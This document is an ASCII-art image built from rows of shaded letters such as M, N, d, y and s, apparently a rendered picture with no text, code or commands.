MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmyyyyyho+++++++dMMMNymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmNMmmmmmh/-y+:ohdyyyyyyddddddddNMMMh+oMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMNNdmMMMMMNhdMMMMMdyMMMMMmdMmmmmmmmmNNmNNMMMMMMMMMMMMMMMMMMMM+/mMMMNo://s/sddddoomo////NydmdNNNNNNNmNNMMMMMMMMNNMMMMMMMMMMMMMN+o+////dNs++/+mMMhydmMMMMysmm/++/oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNyyyyyyo+::sy::-+MMMMMMmmMMMMMNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNmNNmsydmmmmddddmdmddddddddddddmhdmdmmmmmmmmNNNNmNNNmmmmmmmmmmmmmNmdhmdyyyyyymNmdhssNMh:/:oNMMMNyNNyss++mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdddddyhhhhhhy+osssssymmNNmmmNMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNhmNNNNmdNmmmmmmmmmmmmmmmmmmmmmmmmmmNmmmmmmmmmmmmmmmmmNmmmmmNNNNmmmmNmmmmmmmmmmmmmmmNmNmmmmNNNNmmmmNmNNNNddmdmNNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNNNMMMMMMMMNMMMMMNNNNNNNNNNNNNmmmNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNmmmmmmmNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNmmmmmmmmmmmmmmmmmmmmmmmNmNNmmmmmmmmmmmmNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNNNNNNNmmNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNhsssshNNmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNNmmmmmmmmmmmmmmmmmmNNNNNNNNNNNNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNddMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmmdss--/:/:::/+oshmddddddmmmmmmmmmmmmmmmmmmmmNNNNNNNNNNNNNNNNNNNmNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdmmddmmmmmmmmdmddmmddddmmmmmmdmmmNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNddMNh:/:+sshmddddmdmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddmmmmddddddddddddddddddddddddddddddddddddddddddmmmmmdddmmmmdddddddddddddddddhhddddddddddddddddddddddddddmmmdmdmmdmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMddddyhhy+dy-/dddydmmmmmmmmmmNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddmmmdddddddddddddddddddddhddddddhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhdddhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhdddddddhhddddNNNMMMNhsdmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::::/mymhmmmmddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddddddddddddddddddddddhhdhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhddmdo::-:dddmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmmmmddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddmmmdddddddddddmdddddddddddddddddddddddddhhddhddhhhhhhhhhhhhhhyyhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhdddhsoy/-/yo/ssshNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNdmMmNdhNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddhhdhhhhhhhhhhhhhhhhhhhhhhhhhhyhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhyyhhhhhhhhhhhhhhhhhhhhdhydddds/-:yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNd+:.:mhdddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddddddddddddddddddddddddddddddddddddddhhhhdhhhhhhhhhhddhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhddddddNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmhhhhs+-+shddddddmmmmmmmmmmmmmmmmmmmmmdddmmmmddddddddddhhhhhhhhhhhhhhdhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhddmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMN+-//:hodddmmmmddmmmmmmmmmmmmmmmmmmdddddddddddddhhhhhhhhhhhyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyhhhhhyyyyyhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhyyyyhhhhyyhhhhhhhhhhhhhddNNMMMNMMmNyoshdNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh:+ydohmmddmmmmmmmmmmmddddddddddddddddddddhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysyssyyyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhyyyyyyyyyyyyyyhhhhhhhhhhhhhhhddhddmmyo/-..:+NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdy:+mo/sdmmmmmmmmmmmmmmmdddddddddddddhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysyyssssyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyssssssyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhdmNNNdy//+ohsoohNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN+/+odNmmmmmmmmmmmmmmmmddddddddhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyssyysssssssssssssssssssssssssssssyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyssssssssssssyyssyyyysssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhdmmhyyhyo:`-+NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmo:/hdmmmmmmmmmmmmmdddddddhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysssssyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyssssssssssyysssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhyyhhhhhhhhdmmNMNh:`./dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNN./NhdmmmmmmddddddddddddhhhhhhhyyyyyyyyyyyyyyyyyyyysssyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssoosssssssssssssssssssssssssssssssssssssssssssssssysssssssssssyysssyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhddNMNo:/+yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMho+:sdddmmmmmmdddddhhdhhhhhhhyyyyyyyyyyyyyyyyssssysssssssssssssssssssssssssssssssssssssssssoosssssssooosssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhyyyyyyhhhhhhhhhhhhhhhhhhdmNmy-`:mNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdy/`:ohmdmmmmmmmddddhhhhhhhhhyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooosssoosssssssssssssssssssooooooooooooooossssssssoooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhyhmd/.`+yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN/.os+hdmmmmmmmddddhhhhhhhhhhhyyyyyysssssssssssssssssssssssssssssssssssssssssoosooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssoooosoosssssssooooosssssssssssssssssssssssssssssssssyyyyyyyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhyyhdNh:`oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMd`/yddmmmddddmdddhhhhhhhhhyyyyyyyyyyssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssosooooossooooooooooooossssssssssssssssssssssssssssssyyyyyssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhyyyyyhhyhhhhhhhhhhhhhhhhhhhhhhhhhhmd/`NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
